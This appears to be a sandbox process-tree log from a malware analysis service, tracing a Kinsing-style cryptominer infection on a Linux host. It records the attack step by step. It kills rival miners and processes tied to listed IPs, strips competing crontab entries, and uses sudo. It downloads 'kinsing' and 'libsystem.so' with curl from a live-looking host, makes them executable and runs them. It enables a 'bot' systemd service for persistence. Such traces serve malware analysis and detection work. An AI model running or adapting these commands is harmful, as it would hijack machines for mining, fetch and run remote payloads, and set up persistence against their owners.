/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1375
-
-
/bin/grepgrep exe2⤵PID:1378
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1377
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1380
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1382
-
-
/bin/grepgrep exe2⤵PID:1383
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1385
-
-
/usr/bin/idid -u2⤵PID:1386
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1387 -
/usr/sbin/sendmailsendmail -t3⤵PID:1390
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmNVu-0000MQ-KT4⤵
- Reads CPU attributes
PID:1406
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1393
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmNVu-0000MT-K34⤵
- Reads CPU attributes
PID:1405
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1394
-
-
-
/usr/bin/idid -u2⤵PID:1395
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1396
-
-
/bin/unameuname -m2⤵PID:1397
-
-
/bin/grepgrep -v grep2⤵PID:1401
-
-
/bin/lsls -la /etc/data2⤵PID:1399
-
-
/bin/grepgrep -e /dev2⤵PID:1400
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
PID:1402
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1403
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1408
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1410
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1411
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
PID:1412
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1416
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1417
-
-
/bin/grepgrep :14142⤵PID:1419
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1421
-
-
/bin/grepgrep -v -2⤵PID:1422
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1420
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1423
-
-
/bin/grepgrep -v grep2⤵PID:1426
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1425
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1427
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1428
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1424
-
-
/bin/grepgrep -v grep2⤵PID:1431
-
-
/bin/grepgrep stratum2⤵PID:1430
-
-
/bin/psps ax2⤵
- Reads CPU attributes
PID:1429
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1433
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1432
-
-
/bin/grepgrep Sofia2⤵PID:1435
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1434
-
-
/bin/grepgrep -v grep2⤵PID:1436
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1437
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1438
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
PID:1439
-
-
/bin/grepgrep -v grep2⤵PID:1445
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1443
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1447
-
-
/bin/grepgrep tracepath2⤵PID:1444
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1446
-
-
/bin/grepgrep -v grep2⤵PID:1450
-
-
/bin/grepgrep /dot2⤵PID:1449
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1448
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1451
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1452
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1454
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1453
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1456
-
-
/bin/grepgrep -v grep2⤵PID:1455
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1457
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1459
-
-
/bin/grepgrep -v grep2⤵PID:1460
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1461
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1462
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1458
-
-
/bin/grepgrep -v grep2⤵PID:1465
-
-
/bin/grepgrep "bash -k"2⤵PID:1464
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1463
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1466
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1467
-
-
/bin/grepgrep perfctl2⤵PID:1469
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1468
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1471
-
-
/bin/grepgrep -v grep2⤵PID:1470
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1472
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
PID:1473
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
PID:1475
-
-
/bin/grepgrep -v grep2⤵PID:1478
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1476
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1480
-
-
/bin/grepgrep ./ll12⤵PID:1477
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1479
-
-
/bin/grepgrep -v grep2⤵PID:1483
-
-
/bin/grepgrep agetty2⤵PID:1482
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1481
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1485
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1484
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
PID:1486
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1489
-
-
/bin/grepgrep 207.38.87.62⤵PID:1488
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1490
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1492
-
-
/bin/grepgrep -v -2⤵PID:1491
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1494
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1496
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1495
-
-
/bin/grepgrep -v -2⤵PID:1497
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1498
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1500
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1501
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1502
-
-
/bin/grepgrep -v -2⤵PID:1503
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1504
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1507
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1506
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1508
-
-
/bin/grepgrep -v -2⤵PID:1509
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1510
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1513
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1512
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1514
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1516
-
-
/bin/grepgrep -v -2⤵PID:1515
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1517
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
- Reads runtime system information
PID:1518
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
PID:1519
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
PID:1520
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1521
-
-
/usr/bin/pkillpkill -f monero2⤵PID:1522
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1523
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
- Reads runtime system information
PID:1524
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1525
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1526
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1527
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1528
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1529
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1530
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1531
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
PID:1532
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1533
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1534
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
PID:1535
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1536
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1537
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1538
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
PID:1539
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1540
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
PID:1541
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1542
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
PID:1543
-
-
/bin/grepgrep -v grep2⤵PID:1546
-
-
/bin/grepgrep ./udp2⤵PID:1545
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1544
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1548
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1547
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1549
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1551
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1550
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1552
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1554
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1553
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1555
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1557
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1556
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1558
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1559
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1560
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1561
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1563
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1562
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1564
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1565
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1566
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1567
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1568
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1569
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1570
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1571
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1572
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1573
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1575
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1574
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1576
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1578
-
-
/bin/catcat /data/./oka.pid2⤵PID:1577
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1579
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1581
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1580
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1582
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1584
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1583
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1585
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵PID:1586
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
PID:1587
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
PID:1588
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
PID:1589
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1590
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1591
-
-
/bin/grepgrep ./oka2⤵PID:1593
-
-
/bin/grepgrep -v grep2⤵PID:1594
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1595
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1596
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1592
-
-
/bin/grepgrep -v grep2⤵PID:1599
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1598
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1600
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1597
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1601
-
-
/bin/grepgrep -v bin2⤵PID:1604
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1603
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1602
-
-
/bin/grepgrep -v "("2⤵PID:1606
-
-
/bin/grepgrep -v "\\["2⤵PID:1605
-
-
/bin/grepgrep -v php-fpm2⤵PID:1607
-
-
/bin/grepgrep -v proxymap2⤵PID:1608
-
-
/bin/grepgrep -v postgres2⤵PID:1609
-
-
/bin/grepgrep -v postgrey2⤵PID:1610
-
-
/bin/grepgrep -v kinsing2⤵PID:1611
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1612
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1613
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1615
-
-
/bin/grepgrep -v bin2⤵PID:1616
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
PID:1614
-
-
/bin/grepgrep -v "\\["2⤵PID:1617
-
-
/bin/grepgrep -v "("2⤵PID:1618
-
-
/bin/grepgrep -v php-fpm2⤵PID:1619
-
-
/bin/grepgrep -v proxymap2⤵PID:1620
-
-
/bin/grepgrep -v postgres2⤵PID:1621
-
-
/bin/grepgrep -v postgrey2⤵PID:1622
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1623
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1624
-
-
/bin/grepgrep -v bin2⤵PID:1627
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1626
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1625
-
-
/bin/grepgrep -v "\\["2⤵PID:1628
-
-
/bin/grepgrep -v "("2⤵PID:1629
-
-
/bin/grepgrep -v php-fpm2⤵PID:1630
-
-
/bin/grepgrep -v proxymap2⤵PID:1631
-
-
/bin/grepgrep -v postgres2⤵PID:1632
-
-
/bin/grepgrep -v postgrey2⤵PID:1633
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1634
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1636
-
-
/bin/grepgrep -v grep2⤵PID:1639
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1640
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1641
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1638
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1642
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1646
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1645
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1647
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1648
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵
- Checks CPU configuration
PID:1649
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1650
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1653
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1654
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1657
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1658
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1659
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵
- Checks CPU configuration
PID:1660
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1661
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1664
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1665
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1666
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵
- Checks CPU configuration
PID:1667
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1668
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1671
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1672
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1673
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1674
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1675
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1676
-
-
/usr/bin/idid -u2⤵PID:1678
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1679
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1692
-
-
/bin/sedsed /base64/d2⤵PID:1697
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1698
-
-
/usr/bin/crontabcrontab -l2⤵PID:1696
-
-
/bin/sedsed /_cron/d2⤵PID:1700
-
-
/usr/bin/crontabcrontab -l2⤵PID:1699
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1701
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1703
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1704
-
-
/usr/bin/crontabcrontab -l2⤵PID:1702
-
-
/bin/sedsed /update.sh/d2⤵PID:1706
-
-
/usr/bin/crontabcrontab -l2⤵PID:1705
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1707
-
-
/bin/sedsed /logo4/d2⤵PID:1709
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1710
-
-
/usr/bin/crontabcrontab -l2⤵PID:1708
-
-
/bin/sedsed /logo9/d2⤵PID:1712
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1713
-
-
/usr/bin/crontabcrontab -l2⤵PID:1711
-
-
/bin/sedsed /logo0/d2⤵PID:1715
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1716
-
-
/usr/bin/crontabcrontab -l2⤵PID:1714
-
-
/bin/sedsed /logo/d2⤵PID:1718
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1719
-
-
/usr/bin/crontabcrontab -l2⤵PID:1717
-
-
/bin/sedsed /tor2web/d2⤵PID:1721
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1722
-
-
/usr/bin/crontabcrontab -l2⤵PID:1720
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1725
-
-
/bin/sedsed /jpg/d2⤵PID:1724
-
-
/usr/bin/crontabcrontab -l2⤵PID:1723
-
-
/bin/sedsed /png/d2⤵PID:1727
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1728
-
-
/usr/bin/crontabcrontab -l2⤵PID:1726
-
-
/bin/sedsed /tmp/d2⤵PID:1730
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1731
-
-
/usr/bin/crontabcrontab -l2⤵PID:1729
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1733
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1734
-
-
/usr/bin/crontabcrontab -l2⤵PID:1732
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1737
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1736
-
-
/usr/bin/crontabcrontab -l2⤵PID:1735
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1740
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1739
-
-
/usr/bin/crontabcrontab -l2⤵PID:1738
-
-
/bin/sedsed /pastebin/d2⤵PID:1742
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1743
-
-
/usr/bin/crontabcrontab -l2⤵PID:1741
-
-
/bin/sedsed /onion/d2⤵PID:1745
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1746
-
-
/usr/bin/crontabcrontab -l2⤵PID:1744
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1749
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1750
-
-
/usr/bin/crontabcrontab -l2⤵PID:1748
-
-
/bin/sedsed /shuf/d2⤵PID:1752
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1753
-
-
/usr/bin/crontabcrontab -l2⤵PID:1751
-
-
/bin/sedsed /ash/d2⤵PID:1756
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1757
-
-
/usr/bin/crontabcrontab -l2⤵PID:1755
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1760
-
-
/bin/sedsed /mr.sh/d2⤵PID:1759
-
-
/usr/bin/crontabcrontab -l2⤵PID:1758
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1762
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1763
-
-
/usr/bin/crontabcrontab -l2⤵PID:1761
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1765
-
-
/usr/bin/crontabcrontab -l2⤵PID:1764
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1766
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1768
-
-
/usr/bin/crontabcrontab -l2⤵PID:1767
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1769
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1772
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1771
-
-
/usr/bin/crontabcrontab -l2⤵PID:1770
-
-
/bin/sedsed /github/d2⤵PID:1774
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1775
-
-
/usr/bin/crontabcrontab -l2⤵PID:1773
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1777
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1778
-
-
/usr/bin/crontabcrontab -l2⤵PID:1776
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1780
-
-
/usr/bin/crontabcrontab -l2⤵PID:1779
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
